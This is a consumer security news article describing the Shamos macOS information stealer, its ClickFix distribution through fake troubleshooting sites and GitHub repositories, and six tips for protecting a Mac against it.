A new malware campaign is making waves, specifically targeting Mac users across the globe. Security experts at CrowdStrike have identified a variant known as Shamos, which is part of the Atomic macOS Stealer (AMOS) family, created by a cybercriminal group dubbed COOKIE SPIDER. The method of attack employs ClickFix tactics, enticing victims who are seeking Mac troubleshooting assistance to visit counterfeit websites or GitHub repositories. These deceptive sites coax users into copying and pasting a seemingly harmless one-line command into Terminal, which, unbeknownst to them, downloads Shamos, evading macOS Gatekeeper protections and installing the malware.
Once embedded within the system, Shamos embarks on a quest for sensitive information, including Apple Notes, Keychain items, browser passwords, and even cryptocurrency wallets. The pilfered data is then compressed and dispatched directly to the attackers, often accompanied by additional malware such as botnet modules or counterfeit Ledger wallet applications.
How Shamos malware spreads on macOS
The distribution of these fraudulent “fixes” is facilitated through “malvertising” campaigns and imitation tech support sites with names like mac-safer[.]com or rescue-mac[.]com. These pages masquerade as reliable troubleshooting guides and appear prominently in search results for common Mac issues, such as “how to flush resolver cache.” Victims are encouraged to copy and paste commands that download malicious Bash scripts, which then capture the user’s password, disable file protections, and initiate Shamos. With the installation of persistence tools, the malware can even restart with the system, maintaining control long after the initial breach.
Tips to stay safe from Shamos malware
To protect yourself from Shamos and similar threats, consider these proactive measures:
1) Never run commands you don’t understand
While copy-pasting commands into Terminal may seem like a quick fix, it is also a common method for attackers to circumvent Apple’s built-in protections. If you encounter a command on a website, forum, or GitHub repository, refrain from executing it unless you fully comprehend its function. Instead, verify with Apple’s official support site or the Apple Community forums, where knowledgeable users and moderators can confirm safe troubleshooting methods.
2) Avoid sponsored results
Cybercriminals are aware that when your Mac encounters an issue, you will likely seek a swift solution. They exploit this urgency by purchasing sponsored ads that elevate fake troubleshooting websites in search results. Clicking on the top link may seem intuitive, but it could lead to a trap. Rely on trusted sources like Apple Support, or scroll past the ads to locate legitimate guides.
3) Be wary of GitHub projects
While GitHub serves as an invaluable resource for developers, it has also become a breeding ground for malicious repositories that imitate legitimate software. Attackers frequently clone popular applications or tools, embedding malware within. Before downloading anything, scrutinize the publisher’s name, stars, and activity history. If the account appears suspicious, inactive, or newly created, exercise caution and avoid it.
4) Use strong antivirus protection
As Mac malware evolves rapidly, relying solely on Apple’s built-in security features may not suffice. A robust antivirus solution provides an additional layer of defense by scanning downloads, blocking malicious scripts, and detecting suspicious behavior in real-time. Some security tools can even identify the one-line Terminal commands employed by Shamos before they inflict damage.
5) Use a personal data removal service
Given that Shamos is engineered to steal personal information and relay it to cybercriminals, minimizing your online footprint can help mitigate potential fallout. A personal data removal service scans data broker sites and eliminates your exposed information, making it more challenging for attackers to resell or exploit it following a breach. While this won’t prevent malware from stealing what’s on your Mac, it adds another layer of protection by reducing the data available for criminals to exploit.
6) Keep macOS updated
Apple routinely patches vulnerabilities in macOS that malware attempts to exploit. By ensuring your system is up to date, you effectively close the doors that attackers rely on. Enable automatic updates so your Mac receives the latest patches as soon as they are available. Coupling this with good digital hygiene, such as avoiding dubious downloads, significantly lowers your risk of infection.
Kurt’s key takeaways
Cybercriminals are acutely aware that when your Mac malfunctions, you will seek immediate solutions. Shamos capitalizes on this urgency by masquerading as assistance. Staying safe requires a deliberate pause before you copy, paste, or download anything. If something seems amiss, it likely is.
